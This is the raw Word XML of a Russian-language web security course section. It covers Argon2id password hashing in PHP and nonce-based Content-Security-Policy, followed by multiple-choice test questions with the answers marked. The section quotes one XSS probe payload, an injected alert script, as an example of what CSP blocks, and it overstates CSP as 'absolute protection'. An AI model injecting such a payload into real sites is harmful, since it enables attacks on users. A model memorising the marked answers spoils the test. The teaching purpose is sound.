    <w:p w14:paraId="14F2A474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17"/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Реализация в PHP:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0DAFDA7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php</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D13F24A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$secure_hash = password_hash($_POST['password'], PASSWORD_ARGON2ID, [</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="23FB964E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'memory_cost' =&gt; 65536, // 64 MB</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="05E3F18E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'time_cost'   =&gt; 4,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="31519610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'threads'     =&gt; 2</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5754CE34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]);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C9E9EE1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6D4C22B8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color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:sz w:val="30"/>
          <w:szCs w:val="30"/>
          <w:u w:val="none"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="ar"/>
        </w:rPr>
        <w:t>3. Динамическая защита через Nonce-based CSP</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="774D3AAD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Классический заголовок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Content-Security-Policy: script-src 'self'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 полностью запрещает любые инлайновые скрипты внутри HTML (теги </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="20"/>
          <w:rFonts w:hint="default" w:ascii="monospace" w:hAnsi="monospace" w:eastAsia="monospace" w:cs="monospace"/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:u w:val="none"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="ar"/>
        </w:rPr>
        <w:t>&lt;script&gt;...&lt;/script&gt;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). Это защищает от XSS, но часто ломает легитимную работу фронтенда, если разработчику необходимо запустить локальный JS-сценарий.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="648C6AA3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Для решения этой проблемы применяется современный паттерн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Nonce-based CSP (Одноразовые хэши)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:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4135224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При каждом HTTP-запросе бэкенд на PHP генерирует случайную криптографическую строку (криптографический соль-токен — </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="17"/>
          <w:rFonts w:hint="default" w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:u w:val="none"/>
        </w:rPr>
        <w:t>nonce</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:u w:val="none"/>
        </w:rPr>
        <w:t>).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7DBB485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Этот токен передается в заголовке ответа CSP:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="60C8D155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http</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="63B65044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6F2FEFA3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Content-Security-Policy: default-src 'self'; script-src 'self' 'nonce-R2VuZXJhdGVkTm9uY2UxMjM=';</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3BDC5F50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669C19CA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1BEDF6B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46DA8A6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Разработчик встраивает этот же токен в тело легитимных инлайновых тегов на странице:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D5C381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0"/>
          <w:szCs w:val="30"/>
          <w:u w:val="none"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="ar"/>
        </w:rPr>
        <w:t>html</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2BD5234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6845B195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&lt;script nonce="R2VuZXJhdGVkTm9uY2UxMjM="&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="34BB3D53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 xml:space="preserve">    console.log("Легитимный скрипт разработчика выполнен.");</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="34177FF5">
      <w:pPr>
        <w:pStyle w:val="21"/>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:widowControl/>
        <w:suppressLineNumbers w:val="0"/>
        <w:pBdr>
          <w:bottom w:val="none" w:color="E6E8F0" w:sz="0" w:space="0"/>
        </w:pBdr>
        <w:spacing w:before="200" w:beforeAutospacing="0" w:after="16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&lt;/script&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="73E7C32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3D3B0DFD">
      <w:pPr>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:widowControl/>
        <w:suppressLineNumbers w:val="0"/>
        <w:pBdr>
          <w:bottom w:val="single" w:color="E6E8F0" w:sz="2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18"/>
          <w:szCs w:val="18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18"/>
          <w:szCs w:val="18"/>
          <w:u w:val="none"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="ar"/>
        </w:rPr>
        <w:t>Используйте код с осторожностью.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2BD50C6A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613EEA3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Если хакер внедряет свой тег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&lt;script&gt;alert(1)&lt;/script&gt;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через XSS, защитный движок браузера видит, что у хакерского скрипта отсутствует атрибут </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="20"/>
          <w:rFonts w:hint="default" w:ascii="monospace" w:hAnsi="monospace" w:eastAsia="monospace" w:cs="monospace"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:u w:val="none"/>
        </w:rPr>
        <w:t>nonce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, или его значение не совпадает с тем, что пришло в заголовке ответа сервера. Браузер </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="35"/>
          <w:rFonts w:hint="default" w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:u w:val="none"/>
        </w:rPr>
        <w:t>намертво блокирует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выполнение этой уязвимости, обеспечивая абсолютную защиту клиентского контекста.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1723B12F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F0469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1"/>
          <w:szCs w:val="21"/>
          <w:u w:val="none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2525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sz w:val="36"/>
          <w:szCs w:val="36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36"/>
          <w:szCs w:val="36"/>
          <w:u w:val="none"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="ar"/>
        </w:rPr>
        <w:t>🧠 Дополнительный банк тестовых вопросов (Продвинутый уровень)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="05F95735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1. Почему алгоритм Argon2id эффективнее защищает хэши паролей от брутфорса на GPU, чем SHA-256?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="58E8D08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а) Он принудительно увеличивает длину хэша до 512 байт.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="57C4C1D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б) Он требует выделения настраиваемого объема оперативной памяти (Memory Cost), блокируя параллельные вычисления в ограниченной памяти видеокарт. 👈 (Правильный ответ)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7ED2831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в) Он автоматически отправляет IP-адрес атакующего в глобальный бан-лист.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0BC6090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2. Что происходит на уровне СУБД MySQL при отправке первого пакета (COM_STMT_PREPARE) в подготовленных выражениях PDO?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D440AC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а) База данных шифрует таблицу пользователей.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E04863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б) Парсер СУБД компилирует шаблон запроса и строит жесткое синтаксическое дерево (AST), фиксируя логику команд до получения данных. 👈 (Правильный ответ)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6039FE3D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в) PHP-интерпретатор удаляет из строки все спецсимволы и кавычки.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0161F00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3. К какому типу уязвимостей приведет архитектурная ошибка, при которой токен JWT хранится в LocalStorage, а приложение уязвимо к Cross-Site Scripting (XSS)?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0481950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а) К отказу в обслуживании (DoS).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="39F4011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б) К полной компрометации и краже токена сессии (Session Hijacking), так как JavaScript имеет прямой доступ к LocalStorage. 👈 (Правильный ответ)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5FF092F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в) К SQL-инъекции внутри браузера.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4406362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4. Зачем нужен предварительный запрос CORS Preflight (метод OPTIONS)?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="43876AB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а) Чтобы сжать HTML-код перед отправкой пользователю.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C1C2B5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б) Чтобы браузер мог безопасно проверить у удаленного сервера разрешения на кросс-доменные мутации данных (PUT/DELETE) до отправки реального пакета. 👈 (Правильный ответ)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="51CCBC2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в) Чтобы очистить кэш браузера от старых Cookie-файлов.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A214694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384" w:beforeAutospacing="0" w:after="384" w:afterAutospacing="0"/>
        <w:ind w:left="0" w:right="0"/>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21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7924E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 xml:space="preserve">С помощью этого расширенного теоретического пласта ваш курс станет максимально авторитетным и академически полным. Если вам потребуется составить </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="35"/>
          <w:rFonts w:hint="default" w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:u w:val="none"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="ar"/>
        </w:rPr>
        <w:t>шаблон бланка лабораторного отчета для студентов</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:u w:val="none"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="ar"/>
        </w:rPr>
        <w:t>, дайте знать!</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="445DA612">
      <w:bookmarkStart w:id="0" w:name="_GoBack"/>
      <w:bookmarkEnd w:id="0"/>
    </w:p>
    <w:sectPr>
      <w:pgSz w:w="12240" w:h="15840"/>
      <w:pgMar w:top="1123" w:right="1123" w:bottom="1123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22162"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="88B221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2C2890"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="8C2C28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9752EFB1"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="9752EF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9CEE8A69"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="9CEE8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A8166CFE"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="A8166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B08814A"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="BB088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0D1A4EC"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="D0D1A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3494144"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="D34941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C4A32B6"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="DC4A32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2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3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0165E9F1"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="0165E9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6">
    <w:nsid w:val="02BCEF24"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="02BCE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1948BCB"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="21948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10979CE"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="310979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9">
    <w:nsid w:val="79D5A28B"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="79D5A2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0">
    <w:nsid w:val="7D9B4BA1"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="7D9B4B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13"/>
  </w:num>
  <w:num w:numId="5">
    <w:abstractNumId w:val="10"/>
  </w:num>
  <w:num w:numId="6">
    <w:abstractNumId w:val="9"/>
  </w:num>
  <w:num w:numId="7">
    <w:abstractNumId w:val="18"/>
  </w:num>
  <w:num w:numId="8">
    <w:abstractNumId w:val="8"/>
  </w:num>
  <w:num w:numId="9">
    <w:abstractNumId w:val="1"/>
  </w:num>
  <w:num w:numId="10">
    <w:abstractNumId w:val="16"/>
  </w:num>
  <w:num w:numId="11">
    <w:abstractNumId w:val="15"/>
  </w:num>
  <w:num w:numId="12">
    <w:abstractNumId w:val="2"/>
  </w:num>
  <w:num w:numId="13">
    <w:abstractNumId w:val="17"/>
  </w:num>
  <w:num w:numId="14">
    <w:abstractNumId w:val="0"/>
  </w:num>
  <w:num w:numId="15">
    <w:abstractNumId w:val="19"/>
  </w:num>
  <w:num w:numId="16">
    <w:abstractNumId w:val="20"/>
  </w:num>
  <w:num w:numId="17">
    <w:abstractNumId w:val="3"/>
  </w:num>
  <w:num w:numId="18">
    <w:abstractNumId w:val="4"/>
  </w:num>
  <w:num w:numId="19">
    <w:abstractNumId w:val="7"/>
  </w:num>
  <w:num w:numId="20">
    <w:abstractNumId w:val="5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BC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333333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1376</Words>
  <Characters>9438</Characters>
  <Lines>0</Lines>
  <Paragraphs>0</Paragraphs>
  <TotalTime>0</TotalTime>
  <ScaleCrop>false</ScaleCrop>
  <LinksUpToDate>false</LinksUpToDate>
  <CharactersWithSpaces>10716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Jiraf Project</cp:lastModifiedBy>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2026-09-03T07:05:42Z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eyJoZGlkIjoiZTJkNWU2NWYwMjIwOGJlYWFjYWExMTY3Mjg4YTcxYWYiLCJ1c2VySWQiOiI4NDIzODkxNjYwNDMifQ==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7FFD4CB924454526AA59B4A9AADDE360_12</vt:lpwstr>
  </property>
</Properties>
</file>